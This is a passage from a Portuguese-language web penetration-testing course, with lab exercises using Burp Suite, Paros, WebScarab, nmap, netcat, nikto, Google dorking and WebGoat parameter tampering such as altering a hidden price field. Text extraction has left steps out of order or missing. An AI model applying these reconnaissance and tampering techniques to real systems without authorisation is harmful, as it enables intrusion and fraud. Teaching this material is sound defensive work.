QTY=1&SUBMIT=Purchase&Price=2999.99
Observe-se que o corpo da requisio contm os parmetros QTY, SUBMIT e Price. Qual
seria o motivo do preo ser submetido como parte da requisio? Normalmente, apenas as
informaes que sero processadas pela aplicao so enviadas e, assim, razovel supor
que o valor ser empregado para compor o total do pedido. Se esta hiptese estiver correta,
a alterao do valor do campo escondido far com que o preo desejado seja cobrado pelo
produto. Este passo, executado por meio da tela de interceptao do WebScarab, est ilustrado na Figura 2.11, e o resultado, na Figura 2.12.
Figura 2.11
Interceptao da
requisio e alterao do valor do
campo Price.
Figura 2.12
Tela exibindo o total
do pedido.
Segurana de controles
Controles no lado cliente so seguros? Em caso negativo, explique o motivo.
Contramedidas
Para evitar que uma aplicao padea de vulnerabilidades relacionadas a controles
1 Parta da premissa de que todos os usurios da aplicao so maliciosos e, por isso,

toda informao fornecida por eles deve ser validada no servidor, imediatamente
antes de ser utilizada.
1 No assuma que informaes armazenadas em campos escondidos no podem ser

alterados por um usurio, uma vez que no esto visveis.
1 Implemente controles no lado cliente da aplicao, apenas para evitar que um

usurio bem intencionado submeta, por erro, formulrios com campos inconsistentes
e consuma banda de rede desnecessariamente.
1 Nunca espere que todos os parmetros previstos sejam recebidos como parte
da requisio. Usurios maliciosos podem remover um ou mais itens, antes de
implementados no lado cliente, as seguintes melhores prticas devem ser observadas:
submet-la aplicao.
67
68
Atividade 1 Ferramentas bsicas
Nesta atividade, o aluno se familiarizar com as ferramentas bsicas que so utilizadas nas
diversas etapas de um teste de invaso. Para inici-la, carregue as mquinas virtuais do
aluno e do servidor (Fedora) e execute os roteiros na primeira delas.
Proxies de interceptao
Para utilizar proxies de interceptao, necessrio configurar a ferramenta para escutar
a porta desejada e o navegador para direcionar todo trfego para ela. Os roteiros abaixo
ilustram como isso pode ser realizado nos proxies Burp Suite, Paros e WebScarab e nos
navegadores Firefox, Opera e Chrome.
Configurao de porta no Burp Suite
1. Inicie o Burp Suite, presente no menu Aplicativos\Curso Ferramentas.
2. Clique na aba Proxy e, em seguida, na aba-filha Options.
3. Selecione a primeira linha da tabela e clique no boto Edit.
4. Digite a porta desejada no campo local listener port e mantenha listen on loopback
interface only habilitado.

5. Para finalizar, clique em Update.
Configurao de porta no Paros

6. Inicie o Paros, presente no menu Aplicativos\Curso Ferramentas.
7. Clique no menu Tools e no sub-menu Options....
8. Selecione na parte esquerda da janela, a opo Local proxy.
9. Digite a porta desejada no campo Port (eg 8080). Para este exerccio, escolha a porta 9000.
10. Para finalizar, clique em OK.
Configurao de porta no WebScarab

1. Inicie o WebScarab, presente no menu Aplicativos\Curso Ferramentas.
3. Selecione a primeira linha da tabela e clique no boto Stop.

4. Digite a porta desejada no campo Port, abaixo da tabela.
5. Para finalizar, clique em Start.
Configurao do Firefox
1. Inicie o Firefox, presente no menu Aplicativos\Internet.
2. Inicie o proxy desejado. Para este exerccio, utilize o WebScarab, presente no menu
2. Clique na aba Proxy e, em seguida, na aba-filha Listeners.
Aplicativos\Curso Ferramentas.
69
3. No Firefox, clique em Edit, seguido de Preferences.

4. Clique na opo Advanced e na aba Network.
5. Clique em Settings.
6. Selecione Manual proxy configuration.
7. Digite localhost no campo HTTP Proxy e 8008 no campo Port.
8. Clique em Use this proxy server for all protocols.
9. Limpe o campo No proxy for.
10. Finalize a configurao, clicando em OK e em Close.
11. Os passos seguintes so para testar o acesso via WebScarab, mas sem interceptao de
nenhuma das requisies.

12. No WebScarab, selecione a aba Proxy e a aba-filha Manual Edit.
13. Desmarque as opes Intercept Requests e Intercept Responses.
14. Clique na aba Summary e veja que no h nada nas tabelas.
15. Retorne ao Firefox e acesse exemplo.esr.rnp.br.
16. Volte ao WebScarab e veja que as tabelas na aba Summary foram preenchidas com as
requisies efetuadas pelo acesso acima.

17. Encerre o WebScarab.
Configurao do Multiproxy Switch

O Multiproxy Switch um complemento para Firefox, que permite selecionar um proxy a
partir de uma lista pr-cadastrada, simplificando muito o trabalho de configurao.
possvel exibi-lo na barra de ferramentas, no menu de contexto e na barra de estado do
navegador, de acordo com as preferncias do usurio.
O roteiro abaixo inclui o Paros na lista de proxies cadastrados.
2. Clique no Multiproxy Switch, na parte direita da barra de estado, e observe que j existem
alguns itens cadastrados.

3. Selecione Manage Proxies.
4. Clique em Add.
5. Preencha Proxy Label com Paros, HTTP Proxy com localhost, Port com 9000 e selecione
Use this proxy server for all protocols.

6. Clique em OK nas duas janelas.
7. Clique novamente no Multiproxy Switch e veja que um item para o Paros foi adicionado.
Configurao do Opera
1. Inicie o Opera, presente no menu Aplicativos\Internet.
2. Inicie o proxy desejado. Para este exerccio, utilize o Burp Suite, presente no menu
70
3. No Opera, clique em Menu, seguido de Configuraes e Preferncias.

4. Clique na aba Avanado.
5. Escolha o item Rede na parte esquerda da janela.
6. Clique em Servidores de Proxy.
7. Habilite as configuraes para o protocolo HTTP, preenchendo os campos HTTP e
Porta com os valores localhost e 8089, respectivamente.

8. Habilite as configuraes para o protocolo HTTPS, preenchendo os campos HTTPS e Porta
com os valores localhost e 8089, respectivamente.

9. Clique em OK nas duas janelas, para finalizar a configurao.
10. Os passos seguintes so para testar o acesso via Burp Suite, mas sem interceptao de

11. No Burp Suite, selecione a aba Proxy e a aba-filha Options.
12. Role a tela at encontrar a seo intercept client requests.
13. Desabilite a opo intercept if da seo intercept client requests.
14. Desabilite a opo intercept if da seo intercept server responses.
15. Ainda na aba Proxy, clique na aba-filha History e veja que a tabela est vazia.
16. Retorne ao Opera e acesse exemplo.esr.rnp.br.
17. Volte ao Burp Suite e veja que a tabela na aba History foi preenchida com as requisies
efetuadas pelo acesso acima.

18. Encerre o Burp Suite.
Configurao do Chrome
19. Inicie o Chrome, presente no menu Aplicativos\Internet.
20. Inicie o proxy desejado. Para este exerccio, utilize o Paros, presente no menu
21. No Chrome, clique no cone de chave inglesa, localizado ao lado da barra de endereo e
selecione Preferncias.
22. Selecione a aba Under the Hood.
23. Role a pgina at encontrar a seo Network.
25. Na aba Configurao do proxy, selecione Configurao manual de proxy.

26. Selecione Usar o mesmo proxy para todos os protocolos e preencha os campos Proxy HTTP e
Porta com os valores localhost e 9000, respectivamente.

27. Clique em Fechar e, na mensagem que aparece, em Fechar, novamente.
28. Para finalizar, clique em Fechar na janela de preferncias.
29. Os passos seguintes so para testar o acesso via Paros, mas sem interceptao de
24. Clique em Change proxy settings.
30. No Paros, selecione a aba Trap.
71
31. Limpe os check-boxes Trap request e Trap response.

32. Clique na aba History, localizada na parte inferior da tela, e veja que no h itens listados ali.
33. Retorne ao Chrome e acesse exemplo.esr.rnp.br.
34. Volte ao Paros e veja que a lista na aba History foi preenchida com as requisies efetu-
adas pelo acesso acima.

35. Encerre o Paros.
Web spiders
O objetivo desta atividade que o aluno tenha um primeiro contato com web spiders, para
utiliz-los nos exerccios sobre mapeamento.
Spider do Burp Suite
1. Inicie o Burp Suite, presente no menu Aplicativos\Curso Ferramentas.
2. Selecione a aba Spider.
3. Selecione a aba-filha Control e veja as opes disponveis.
4. Selecione a aba-filha Options e veja as opes disponveis.
5. Para finalizar, clique em Help e em spider help e faa uma breve leitura do contedo.
6. Encerre o Burp Suite.
Spider do Paros
2. Selecione a aba Spider, na parte inferior da tela, e veja as opes disponveis.
3. Clique em Analyse e em seguida em Spider. O que acontece?
4. Encerre o Paros.
Spider do WebScarab
2. Selecione a aba Spider e veja as opes disponveis.
3. Clique em Help e em Contents.
4. Expanda o ramo WebScarab Plugins, selecione The Spider plugin e leia o contedo apresentado.
72
Varredores de portas e servios

O representante mais conhecido deste tipo de software o Nmap, cuja interface grfica
oficial o Zenmap. Siga o roteiro abaixo para um contato inicial com a ferramenta.
1. Abra uma janela de terminal.
2. Veja a documentao do Nmap:
man nmap
3. Execute uma varredura local bsica e analise o relatrio apresentado:
nmap localhost
4. Encerre o terminal.
Outras ferramentas
H outras ferramentas que podem ser utilizadas em testes de invaso de aplicaes web,
das quais, nesta atividade, sero abordadas o Netcat, o OpenSSL e o Nikto.
Netcat
O roteiro abaixo emprega o Netcat para implementar um modelo cliente-servidor simples.
2. Veja a documentao do Netcat:
$ man netcat
3. Digite o comando abaixo para que o Netcat escute conexes na porta 7000:
$ nc l 7000
4. Abra outro terminal.
5. Conecte-se primeira instncia do Netcat, por meio do comando:
$ nc localhost 7000
6. Digite alguns textos e veja que so refletidos no outro terminal.
7. Encerre o cliente pressionando Control+D.
8. Encerre uma das janelas de terminal.
OpenSSL
Como se sabe, o Netcat no capaz de tratar os protocolos SSL e TLS nativamente e,
assim, o roteiro abaixo ilustra como o OpenSSL pode preencher esta lacuna, por meio do
comando s_client.
9. Mude o foco para a janela de terminal da ltima atividade.
10. Conecte-se ao servidor w3s.esr.rnp.br, com o comando:
$ openssl s_client -connect w3s.esr.rnp.br:443

11. Acesse a pgina raiz, digitando:
12. Role a janela para visualizar a sada do OpenSSL.
Nikto
1. Mude o foco para a janela de terminal da ltima atividade.
2. Veja a documentao do Nikto:
$ man nikto
$ GET / HTTP/1.0
3. Encerre a janela de terminal.
73
Atividade 2 Reconhecimento
O objetivo desta atividade exercitar os diversos passos que fazem parte da etapa de
reconhecimento de um teste de invaso, cujo propsito levantar o mximo possvel de
informaes da aplicao alvo.
Levantamento de informaes em fontes pblicas

Muitas informaes teis para um teste de invaso podem ser obtidas em fontes pblicas,
como redes sociais, grupos de discusso e anncios de emprego. Com o roteiro abaixo, que
deve ser executado em uma janela de terminal, algumas das informaes sobre a organizao em que trabalha sero identificadas.
Considere as redes sociais de que participa. Identifique que informaes sobre tecnologias
utilizadas pela organizao em que trabalha podem ser extradas de seus perfis e das comunidades de que faz parte.
1. Consulte as informaes de registro de domnio da sua organizao e identifique informa-
es relevantes para testes de invaso.
$ whois <nome de domnio da empresa>

2. Identifique os servidores de nome e de e-mail da sua organizao, com o seguinte
comando:
$ dig ANY <nome de domnio da empresa>

3. Tente executar uma transferncia de zona DNS para o domnio da sua organizao. Na
remota possibilidade desta funcionalidade estar habilitada, uma vulnerabilidade acaba de

ser encontrada e precisa ser corrigida.
$ dig t AXFR <nome de domnio da empresa>
Google hacking
Mecanismos de busca como o do Google permitem encontrar muitas informaes sobre
uma aplicao e, assim, so muito teis em testes de invaso. Nesta prtica, o aluno executar diversas consultas ao Google, para explorar as opes existentes. Para cada pesquisa,
observe o total de itens encontrados, o tempo de execuo e as pginas listadas.
1. Inicie o navegador de sua preferncia e acesse www.google.com.
2. Para encontrar pginas em ingls sobre testes de invaso em aplicaes web, submeta a
seguinte pesquisa:
web application penetration testing

3. Altera a pesquisa para a seguinte e observe o que muda nos resultados:
web application OR penetration testing

4. Aplique a seguinte alterao para buscar pginas que possuam web application ou
penetration testing:
web application OR penetration testing

5. Execute a pesquisa abaixo para listar varredores de vulnerabilidades:
vulnerability scanners
74
6. Se no estiver interessado no Nessus, por exemplo, inclua -nessus:
vulnerability scanners nessus

7. Veja o que o Google encontra sobre a sua empresa, digitando:
<nome da empresa em que trabalha>

8. Para restringir a busca ao domnio da sua empresa, empregue o operador site:
site:<domnio da empresa>
9. Verifique se sua empresa possui algum sistema web voltado para internet com uma
pgina de autenticao de usurio:
site:<domnio da empresa> login OR logon

10. Procure na internet stios web com listagem de diretrios habilitada:
intitle:Index of
11. Para encontrar arquivos .bak, utilize a pesquisa:
intitle:Index of filetype:bak
12. Localize na internet relatrios gerados pelo Nessus:
This file was generated by Nessus

Identificao de sistema operacional, servios e portas
Neste exerccio, ser realizada a identificao do sistema operacional, servios e portas do
servidor que hospeda exemplo.esr.rnp.br.
1. Inicie uma janela de terminal.
2. Execute o comando e analise o relatrio gerado:
$ nmap exemplo.esr.rnp.br
3. O comando acima apenas identificou as portas e servios do servidor, mas no exibiu
nada sobre o sistema operacional e plataformas que fornecem os servios. Isso pode ser
obtido com a opo -A:
$ nmap -A exemplo.esr.rnp.br
4. Aparentemente, a opo -A fez apenas metade do trabalho esperado, pois no identi-
ficou o sistema operacional. O motivo disso que, para essa funcionalidade ser executada
corretamente, o programa deve ser executado por um usurio privilegiado. Assim, chame
o Nmap via sudo e fornea a sua senha quando solicitada:
$ sudo nmap -A exemplo.esr.rnp.br
Quantos e quais servidores web foram identificados?
75
5. O Nmap possui uma interface grfica oficial, chamada de Zenmap. Inicie-a, a partir do
menu Aplicativos\Curso Ferramentas e fornea sua senha, quando solicitada.

6. Explore as opes disponveis na interface grfica.
7. Digite exemplo.esr.rnp.br no campo Target e observe como o campo Command atualizado
em tempo real.
8. Clique no boto Scan e aguarde at que a tarefa seja executada.
9. Analise o resultado, percorrendo as abas Nmap output, Ports / Hosts, Topology, Host Details
e Scans.
10. Feche a janela do Zenmap, mas mantenha o terminal aberto para a prxima atividade.
Identificao do servidor web

Na atividade anterior, o Nmap j realizou um timo trabalho na identificao de servidores
web. Apesar disso, sempre bom conhecer mtodos alternativos de se realizar a mesma
tarefa. Assim, nesta atividade, sero estudadas tcnicas adicionais para identificar o tipo de
servidor web em uso.
2. Acesse http://exemplo.esr.rnp.br/blabla e veja se a mensagem de erro d alguma pista
sobre o servidor. o mesmo que o identificado pelo Nmap? Esta tcnica robusta?
3. Repita o passo anterior para as seguintes URLs:
http://exemplo.esr.rnp.br:81/blabla
4. Outra tcnica consiste na anlise do cabealho Server, fornecido pelo servidor como parte
das respostas. Para realizar este teste, abra uma nova janela de terminal e digite o texto
abaixo, finalizando com [Enter] duas vezes:
$ nc exemplo.esr.rnp.br 80
HEAD / HTTP/1.0
O valor do cabealho supracitado est de acordo com o tipo de servidor identificado pelo
Nmap? Esta tcnica robusta?
76
5. Repita o Passo 4, substituindo a porta 80 por 81, 8080 e 8090.

6. Houve algum problema ao realizar o teste para a porta 81? Provavelmente sim, e o motivo
que o lighttpd, na verso 1.4, somente aceita linhas terminadas pelos caracteres CR e LF,
enquanto que o sistema operacional Linux adota apenas o caractere LF. Para corrigir isto,
utilize a opo -C do Netcat.
7. A ltima tcnica envolve o uso do utilitrio httprint. Inicie-o a partir do menu
8. Na tabela localizada abaixo do campo Signature File, insira uma linha para cada uma das
portas no conjunto {80, 81, 8080, 8090}, com Host igual a exemplo.esr.rnp.br e com o
check-box marcado. Para incluir uma nova linha, basta pressionar a tecla [Enter], quando
o foco estiver em Host ou Port.
9. Clique no boto Options, desabilite a opo ICMP Enable e clique em OK.
10. Para iniciar a execuo, clique no boto que contm uma seta verde.
11. Compare o resultado com o Nmap, por meio da coluna Banner Deduced, e observe que no
foi muito satisfatrio. Esse resultado, contudo, pode ser melhorado por meio da adio
de assinaturas de servidores web ao arquivo signatures.txt do httprint. A localizao deste
arquivo pode ser observada no campo Signature File, que, no exerccio, aparece como um
subdiretrio do drive Z, porque o utilitrio est sendo executado via Wine.
12. Selecione na tela do httprint a linha do servidor lighttpd e copie para a rea de transfe-
rncia (Control-C) a regio abaixo da tabela, contendo nome do servidor e cinco linhas
em hexadecimal.
13. Abra uma janela de terminal e digite o seguinte comando, fornecendo a senha quando
solicitada:
$ sudo gedit /usr/share/httprint_301/win32/signatures.txt

14. Logo aps a linha # $AUTOGENERATED: {version}, cole o que copiou do httprint, deixando
uma linha em branco antes da seo seguinte.

15. Salve o arquivo e execute novamente o httprint. O que acontece?
16. Feche as janelas do gedit, httprint e terminais.
Levantamento dos mtodos suportados pelos servidores web

Neste roteiro, por meio do mtodo OPTIONS, o aluno deve identificar os mtodos suportados pelos quatro servidores web instalados na mquina virtual Fedora.
17. Abra uma janela de terminal e digite o texto abaixo, finalizando com [Enter] duas vezes:
$ nc exemplo.esr.rnp.br 80
OPTIONS / HTTP/1.0
18. Repita o processo para as portas 81, 8080 e 8090, lembrando-se como proceder, no caso
do lighttpd.
Deteco de hosts virtuais

Nesta atividade, sero exercitados mtodos para a deteco dos hosts virtuais.
1. Inicie o navegador de sua preferncia.
2. Acesse http://dvwa.esr.rnp.br.
3. Acesse http://exemplo.esr.rnp.br.
19. Feche a janela de terminal.
77
5. Digite o comando abaixo e anote o endereo IP:
$ ping -c 1 dvwa.esr.rnp.br
6. Digite o comando abaixo e anote o endereo IP:
$ ping -c 1 exemplo.esr.rnp.br
7. Quando os dois endereos IP so iguais e os dois stios so acessados pela mesma porta,
significa que so hospedados virtualmente pelo mesmo servidor, que os discerne pelo
nome de domnio. A desvantagem deste mtodo, porm, que nem sempre haver dois
nomes de domnio diferentes disposio, para realizar o teste descrito.
8. Uma tcnica diferente, que depende de sorte para funcionar, consiste em acessar o stio
web por meio do endereo IP. Assim, considere que a aplicao alvo seja dvwa.esr.rnp.br
e a acesse em um navegador web utilizando o endereo IP descoberto no Passo 5. Observe
que a pgina exibida pertence ao domnio exemplo.esr.rnp.br, o que implica que a hospedagem virtual por nomes utilizada. O fator azar est relacionado chance do stio web
alvo ser exatamente o host padro do servidor web. Neste caso, o teste no conclusivo.
9. Repita o exerccio anterior para os servidores web que escutam nas portas 81, 8080
e 8090 da mesma mquina. Primeiro, observe a pgina obtida pelo acesso com a URL
http://exemplo.esr.rnp.br:<porta> e, em seguida, por meio de endereo IP, com a URL
http://192.168.213.200:<porta>. Quais esto utilizando hospedagem virtual?
10. A ltima tcnica envolve o uso de uma ferramenta web para mapear endereos IP para
nomes de domnio. Inicie acessando uma janela de terminal.

11. Digite o comando abaixo para descobrir o endereo IP do servidor web da sua empresa:
$ dig <URL do stio web da sua empresa>

12. Acesse http://whois.webhosting.info em um navegador, digite o endereo IP encontrado
no passo anterior e clique em Go.

13. Se domnios de empresas diferentes forem listados, o stio web de sua empresa est
armazenado em um servidor com hospedagem virtual habilitada.

14. Feche o navegador e a janela de terminal.
Descoberta de arquivos e diretrios

Para finalizar as atividades sobre reconhecimento, o aluno executar a ferramenta Nikto
para descoberta de arquivos e diretrios instalados por padro nos servidores web.
78
2. Digite o comando abaixo e observe o relatrio gerado:
$ nikto C all -host exemplo.esr.rnp.br -port 80

3. Anote todos os recursos encontrados para uso na fase de mapeamento.
4. Repita o exerccio acima, trocando a porta 80 por 81, 8080 e 8090.
Atividade 3 Mapeamento
Nesta atividade, o aluno realizar o mapeamento de uma aplicao web, contida na
mquina virtual Fedora. A ferramenta bsica que ser utilizada o web spider, para cpia
local das pginas e recursos que compem a aplicao.
Cpia das pginas e recursos da aplicao

Nesta atividade, o aluno poder comparar os web spiders que fazem parte das sutes integradas de teste Burp Suite, WebScarab e Paros.
Uso do spider do Paros
2. Clique em Tools e em Clear Recent History, para limpar o histrico. Na janela que aparece,
selecione Everything para Time range to clear, marque todos os itens em Details e pressione
Clear now.
4. No Firefox, clique no Multiproxy Switch, na barra de estado, e selecione o Paros.
5. Clique no marcador Mutillidae, para acessar a aplicao.
6. Percorra os links Register, Login, Logout, Show log, Credits, User info, DNS
Lookup, Add to your blog, View someones blog, Browser info, Text file viewer e
Source viewer e submeta quaisquer formulrios que forem apresentados.
7. Acesse pginas, diretrios e arquivos encontrados na fase de reconhecimento.
8. No Paros, percorra e analise o mapa criado na aba Sites.
9. Clique em Tools, seguido de Options....
10. Selecione Spider na parte esquerda da janela.
11. Inclua a URL http://mutillidae.esr.rnp.br/setupreset.php em URLs to be skipped e not read.
12. Desmarque POST forms.
13. Clique em OK.
14. Selecione http://mutillidae.esr.rnp.br na aba Sites e clique com o boto direito.
15. Selecione Spider e clique em Start. O processo demorar alguns minutos.
16. Analise novamente o mapa criado na aba Sites.
18. Observe que as URLs encontradas no processo de cpia so listadas no quadro inferior
da tela.
19. No encerre o Paros.
Uso do spider do WebScarab

17. Selecione a aba Spider, na parte inferior da tela.
Clear now.
79

4. No Firefox, clique no Multiproxy Switch, na barra de estado, e selecione o WebScarab.
8. No WebScarab, selecione a aba Summary.
9. Analise o mapa da aplicao, organizado em rvore, e as requisies na tabela localizada
abaixo deste. Observe as colunas existentes nas duas partes.

10. Selecione a aba Spider.
11. Preencha o campo Allowed Domains com .*esr\.rnp\.br.*.
12. Marque Synchronise cookies e Fetch Recursively.
13. Expanda a rvore referente aplicao Mutillidae e selecione a URL.
14. Clique em Fetch Tree. Infelizmente, o WebScarab no possui uma barra de progresso da
tarefa e, assim, a nica maneira de saber que o processo terminou quando nenhum
item for adicionado ou removido da tela.
15. Retorne aba Summary e analise novamente o mapa da aplicao.
16. Observe na tabela de requisies que algumas linhas com Origin igual a Spider foram
includas pelo Passo 14.

17. No encerre o WebScarab.
Uso do spider do Burp Suite

Clear now.
3. Inicie o BurpSuite, presente no menu Aplicativos\Curso Ferramentas.
4. No Firefox, clique no Multiproxy Switch, na barra de estado, e selecione o Burp Suite.

8. No Burp Suite, selecione a aba Target e a aba-filha Site map.
9. Analise o mapa da aplicao na parte esquerda da tela, a lista de requisies e os detalhes
destas e das respostas.

10. No mapa da aplicao, clique com o boto direito sobre o item referente ao Mutillidae e
selecione Add item to scope.

80
11. Clique novamente com o boto direito sobre o item referente ao Mutillidae, selecione
Spider this host e clique no boto Yes, na mensagem que aparece.

12. Neste processo, algumas janelas para submisso de formulrios aparecero. Preencha os
campos e clique em Submit form, sempre que isso acontecer.

13. Observe que novos elementos foram adicionados ao mapa da aplicao, ao fim do processo.
14. Procure pelo arquivo config.inc e selecione-o. Que contedo interessante ele revela?
15. Agora, procure pelo arquivo accounts.txt, selecione-o e observe o que ele contm. Qual a
utilidade das informaes encontradas?
16. No encerre o Burp Suite.
Identificao dos pontos de entrada de informao

A partir das pginas e recursos copiados no primeiro passo do mapeamento, necessrio
identificar pontos de entrada de informao, que sero empregados para testar a presena
de uma srie de vulnerabilidades. As anotaes podem ser feitas em uma planilha, listando
mtodo, URL, parmetros, cabealhos e quaisquer outras informaes que possam ser teis
para o teste de invaso.
No Paros
1. Retorne janela do Paros.
2. Selecione a aba Request.
3. Selecione a aba History.
4. Percorra os itens do histrico, um a um, analisando a requisio que foi realizada e identi-
ficando parmetros passados em requisies GET e POST.

5. Repita o processo para o mapa da aplicao.
6. Selecione a aba Response.
7. Percorra os itens do histrico, um a um, analisando a resposta fornecida e observando
cabealhos no padronizados e definies de cookies.

8. Repita o processo para o mapa da aplicao.
9. Feche a janela do Paros.
10. Retorne janela do WebScarab.

11. Selecione a aba Summary.
12. Percorra os itens do mapa da aplicao, um a um, analisando as colunas marcadas e a
dica que fornecem.

13. Analise os itens contidos na tabela de requisies e observe os parmetros passados em
requisies GET e POST.
No WebScarab
81
14. Role a tabela at o item com menor ID.

15. D um duplo clique sobre ele e veja que uma tela com detalhes da requisio e da res-
posta aparece.
16. Esta janela dividida em quatro sees separadas por uma barra fina, contendo setas no
lado esquerdo. Clique nas setas que apontam para baixo na primeira e terceira barras.
Isto ocultar o corpo das mensagens.
17. Na seo de requisio, clique na aba Raw.
18. Percorra os diversos itens, clicando no boto Next, e, durante esta tarefa, observe os
parmetros passados em requisies GET e POST, cabealhos no padronizados e pontos

em que cookies so definidos.
19. Feche a janela do WebScarab.
No Burp Suite
20. Retorne janela do Burp Suite.
21. Selecione a aba Target e a aba-filha Site map.
22. Clique na barra Filter e marque o campo Show only in-scope items.
23. Clique novamente na barra para recolher a janela.
24. Selecione a aba Request, abaixo da tabela de requisies, e a aba-filha Raw.
25. Percorra os itens do mapa da aplicao, um a um, analisando a requisio que foi reali-
zada e identificando parmetros passados em requisies GET e POST.

26. Selecione a aba Response, abaixo da tabela de requisies, e a aba-filha Raw.
27. Percorra os itens do mapa da aplicao, um a um, analisando a resposta gerada pelo ser-
vidor e identificando cabealhos no padronizados e pontos em que so definidos cookies.

28. Clique com o boto direito na raiz do mapa da aplicao e selecione Copy links in this host.
29. Abra o gedit, localizado no menu Aplicativos\Acessrios, e pressione Ctrl+V, para colar os
links existentes nas pginas da aplicao. Veja se encontra alguma coisa interessante.
30. Feche a janela do Burp Suite.
Atividade 4 Descoberta e explorao de vulnerabilidades

O propsito da presente atividade introduzir ao aluno o processo de descoberta e explorao de vulnerabilidades. Ser abordada a explorao de controles no lado cliente, que,
muitas vezes, constitui o nico ponto de validao das informaes fornecidas pelos usurios. Como se sabe, tal prtica censurvel, pois, normalmente, uma tarefa trivial quebrar
este tipo de mecanismo. Nos exerccios que se seguem, recomenda-se que o aluno tente
traar a estratgia de explorao, antes de seguir o roteiro fornecido.
Acesso ao WebGoat
Os exerccios desta atividade sero executados no OWASP WebGoat, uma aplicao contendo vulnerabilidades propositais, para o estudo de segurana em aplicaes web.
82
3. Selecione a aba-filha Manual Edit, sob a aba Proxy, e desmarque a opo Intercept requests.
5. Clique no marcador WebGoat e fornea guest e guest, quando usurio e senha
forem solicitados.
6. Clique em Start WebGoat.
Evaso de restries em campos HTML

Neste exerccio, um formulrio contendo diversos campos com restries apresentado
pela aplicao e o aluno deve violar todas as regras definidas. Para facilitar na soluo,
pense qual elemento responsvel por honrar as restries dos campos.
1. Selecione a aba Summary no WebScarab e identifique o ID da ltima requisio.
2. No WebGoat, clique no menu Parameter Tampering e no sub-menu Bypass HTML
Field Restrictions.
3. Verifique as restries definidas para cada campo do formulrio.
4. Submeta o formulrio, clicando em Submit.
5. Retorne ao WebScarab, d um duplo clique na requisio posterior identificada no
passo 1 e observe os parmetros passados via POST. Repare que o campo desabilitado
no submetido ao servidor.
6. Feche a janela.
7. Clique na aba Proxy e na aba-filha Manual Edit.
8. Marque a opo Intercept requests e desmarque as demais.
9. Volte ao Firefox e pressione Ctrl+U para visualizar o cdigo-fonte.
10. Pressione Ctrl+F e digite Disabled input field:, para encontrar o campo desabilitado.
11. Anote o nome do campo, definido no elemento <input>, e feche a janela de visualizao de
cdigo-fonte.
12. Clique em Submit novamente. Uma janela aparece, contendo a requisio que ser efe-
tuada. Para alterar o valor de um parmetro, basta dar um duplo clique na coluna Value,
na linha correspondente, e digitar a nova informao.
13. Clique em Insert.
14. Substitua o nome Variable pelo identificado no Passo 11.
15. Altere os seis parmetros para o valor blabla.
17. O exerccio finalizado com sucesso e a mensagem * Congratulations. You have
successfully completed this lesson. exibida.
Evaso de validao Javascript

O objetivo deste exerccio ilustrar como a validao de informaes, por meio de Javascript,
pode ser facilmente quebrada, quando ela no ratificada pelo servidor.
16. Clique em Accept changes.
2. Desmarque todas as opes.
83
3. Retorne ao WebGoat e clique no menu Parameter Tampering e no sub-menu Bypass Client
Side JavaScript Validation.

4. Leia as regras definidas para cada campo, altere-os para valores invlidos e submeta o
formulrio, clicando em Submit.

5. Veja que a validao local identifica problemas nos campos e impede que a requisio
seja realizada. Feche a janela de mensagem.

6. Clique em Restart this lesson.
7. Retorne ao WebScarab e clique em Intercept requests.
8. Volte ao Firefox e submeta o formulrio novamente. Uma janela aparece, contendo a
requisio que ser efetuada.

9. Insira o caractere ! ao final dos valores dos parmetros.
11. O exerccio finalizado com sucesso e a mensagem * Congratulations. You have
successfully completed this lesson. exibida.
Explorao de campo escondido

Esta atividade simula uma aplicao para suporte a cliente, que permite enviar uma mensagem ao administrador, por meio do formulrio fornecido. O objetivo enviar mensagens a
pessoas arbitrrias, mesmo sem a existncia de tal opo.
2. Desmarque todas as opes.
3. Retorne ao WebGoat e clique no menu Parameter Tampering e no sub-menu Exploit
Unchecked Email.
4. Role a pgina at o final do formulrio, preencha-o e clique em Send!.
5. Veja no final da pgina apresentada o formato da mensagem submetida.
6. Retorne ao WebScarab e clique em Intercept requests.
7. Volte ao Firefox e submeta uma nova mensagem pelo sistema. Uma janela aparece, con-
tendo a requisio que ser efetuada.

8. Observe a existncia do parmetro to. Este um campo escondido do formulrio, que
teria sido encontrado na fase de mapeamento da aplicao. Isto um exemplo da importncia de no se pular etapas.
9. Altere o valor do parmetro to para friend@owasp.org.
84

11. Role at o final da pgina e verifique que a mensagem foi enviada ao e-mail
friend@owasp.org, em vez de webgoat.admin@owasp.org. A pgina de sucesso no

aparece, porque este roteiro apenas parte do esperado.
Bibliografia 2
1 DOUP, Adam; COVA, Marco e VIGNA, Giovanni. Why Johnny Cant Pentest: An Analysis of
Black-box Web Vulnerability Scanners. In: Proceedings of Seventh Conference on Detection of
Intrusions and Malware & Vulnerability Assessment (DIMVA 2010). Bonn, Germany, 2010.
1 HERZOG, Pete. OSSTMM 3 The Open Source Security Testing Methodology Manual
Contemporary Security Testing and Analysis. ISECOM, 2010.
1 LONG, Johnny; TEMMINGH, Roelof; STEWART, Jeff; PETKOV, Petko D. e LANGLEY, Ryan.
Google Hacking for Penetration Testers: Volume 2 a completely new volume of Google
hacking techniques. Syngress, 2008.
1 MCGRAW, Gary. Software Security: Building Security In. Addison-Wesley Professional, 2006.
1 NETMARKETSHARE. Browser market share. Disponvel em: http://marketshare.hitslink.
com/report.aspx?qprid=0. Data de acesso: 28/12/2010.
1 POSTEL, Jon. RFC 793 Transmission Control Protocol DARPA Internet Program
Protocol Specification. 1981.
1 SCARFONE, Karen; SOUPPAYA, Murugiah; CODY, Amanda e OREBAUGH, Angela.

Technical Guide to Information Security Testing and Assessment Recommendations
of the National Institute of Standards and Technology. NIST Special Publication 800-115,
National Institute of Standards and Technology, 2008.
1 STATCOUNTER. Top 5 browsers from Nov 09 to Nov 10. Disponvel em:

http://gs.statcounter.com/. Data de acesso: 28/12/2010.
1 STATOWL. Web browser market share. Disponvel em: http://www.statowl.com/web_

browser_market_share.php. Data de acesso: 28/12/2010.
1 STUTTARD, Dafydd; PINTO, Marcus. The Web Application Hackers Handbook. Wiley
Captulo 2 - Bibliografia 2
85
86
3
Apresentar as principais vulnerabilidades s quais esto sujeitos os mecanismos
de autenticao de usurios, bem como as tcnicas que podem ser empregadas
para detect-las e explor-las.
conceitos
Fatores e tecnologias de autenticao, enumerao de usurios, autenticao com

mltiplos fatores, ataques de fora bruta, ataques de dicionrio, rainbow tables,
poltica de senhas fortes.
Introduo
Um requisito importante de segurana da informao, que deve ser satisfeito por apli-
caes web, a autenticao de entidades, isto , a corroborao da identidade da parte

com a qual se comunica.
Por um lado, os usurios querem ter a certeza de que esto conectados com o servidor
